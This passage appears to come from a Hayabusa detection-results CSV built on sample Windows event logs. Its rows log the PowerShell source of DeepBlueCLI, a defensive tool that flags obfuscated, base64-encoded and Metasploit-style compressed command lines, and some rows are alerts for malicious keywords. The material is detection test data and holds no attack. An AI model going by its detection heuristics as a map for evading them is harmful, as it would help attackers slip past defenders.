$securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $output += $eventxml.Event.EventData.Data[4].""#text"" $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:44:35.127 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:44:35.127 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"$text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:44:35.127 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"$text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:44:35.130 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $output += $eventxml.Event.EventData.Data[4].""#text"" $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:44:35.136 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:44:35.139 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:44:48.428 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:44:48.428 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:44:48.429 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than 